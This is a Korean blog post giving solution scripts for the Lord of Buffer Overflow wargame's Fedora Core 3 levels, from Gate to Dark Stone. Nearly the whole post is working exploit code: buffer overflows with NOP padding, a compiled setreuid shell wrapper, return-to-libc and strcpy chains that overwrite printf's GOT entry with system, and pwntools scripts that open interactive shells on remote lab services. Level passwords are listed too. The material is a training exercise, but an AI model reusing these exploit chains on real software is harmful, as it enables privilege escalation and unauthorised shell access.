Lord of Buffer Overflow Fedora Core 3에 대한 설명은 다른 블로그에 많으니 생략하겠습니다.
Gate -> Iron Golem
#!/usr/bin/python
import os
from struct import *
p = lambda x : pack("<L", x)
f = open('shell.c', 'w')
f.write('''
#include <stdio.h>
int main(int argc, char *argv[]){
setreuid(geteuid(), geteuid());
setregid(getegid(), getegid());
execl("/bin/bash", "sh", 0);
return 0;
}
''')
f.close()
execl = 0x7a5720+3
vuln_addr = 0x804962c-8
os.system("gcc -o shell shell.c")
os.system("ln -s shell \x68\x10")
payload = "\x90"*264 + p(vuln_addr) + p(execl).replace("\x00", "")
os.system("./iron_golem" + " " + payload)
#sh-3.00$ my-pass
#euid = 501
#blood on the fedora
Iron Golem -> Dark Eyes
import os
from struct import *
p = lambda x : pack("<L", x)
f = open('shell.c', 'w')
f.write('''
#include <stdio.h>
int main(int argc, char *argv[]){
setreuid(geteuid(), geteuid());
setregid(getegid(), getegid());
execl("/bin/bash", "sh", 0);
return 0;
}
''')
f.close()
execl = 0x7a5720
ret_gadget = 0x80484b9
os.system("gcc -o shell shell.c")
os.system("ln -s shell \x3c\xed\x83")
payload = "\x90"*268 + p(ret_gadget)*3 + p(execl).replace("\x00", "")
os.execl("./dark_eyes", "malhyuk", str(payload))
#sh-3.00$ my-pass
#euid = 502
#because of youDark Eyes -> Hell Fire
#!/usr/bin/python
from pwn import *
r = remote("10.10.10.128", 7777)
r.recvuntil("you : ")
system_addr = 0x00750784
payload = "\x90"*268 + str(p32(system_addr))
r.send(payload)
r.interactive()
#$ my-pass
#euid = 503
#sign me upHell Fire -> Evil Wizard
#coding : utf-8
#!/usr/bin/python
import os
from struct import *
p = lambda x : pack('<L', x)
strcpy = 0x8048495
printf_plt = 0x8048424
printf_got = 0x8049884
system_c0 = 0x8048420
system_07 = 0x8048154
system_75 = 0x80482c8
system_00 = 0x8049840
shell = 0x833603
ppr = 0x804854f
payload = 'A'*268 + p(strcpy) + p(ppr) + p(printf_got) + p(system_c0)
payload += p(strcpy) + p(ppr) + p(printf_got+1) + p(system_07)
payload += p(strcpy) + p(ppr) + p(printf_got+2) + p(system_75)
payload += p(strcpy) + p(ppr) + p(printf_got+3) + p(system_00)
payload += p(printf_plt) + "AAAA" + p(shell).replace("\x00", "")
os.execl("./evil_wizard", "malhyuk", str(payload))
#sh-3.00$ my-pass
#euid = 504
#get down like that
Evil Wizard -> Dark Stone
#!/usr/bin/python
from pwn import *
r = remote('10.10.10.128', 8888)
r.recvuntil("you : ")
strcpy = 0x8048438
printf_plt = 0x8048408
printf_got = 0x804984c
system = [0x80484d0, 0x804817c, 0x80482b4, 0x8049804]
shell = 0x833603
ppr = 0x80484f3
payload = "\x90"*268
for i in range(4) :
payload += p32(strcpy) + p32(ppr)
payload += p32(printf_got + i) + p32(system[i])
payload += p32(printf_plt) + "AAAA" + p32(shell)
r.send(str(payload))
r.interactive()
#$ my-pass
#euid = 505
#let there be light
All Clear
'Wargame > Lord of Buffer Overflow' 카테고리의 다른 글
| Lord of Buffer Overflow All Clear (0) | 2016.12.13 |
|---|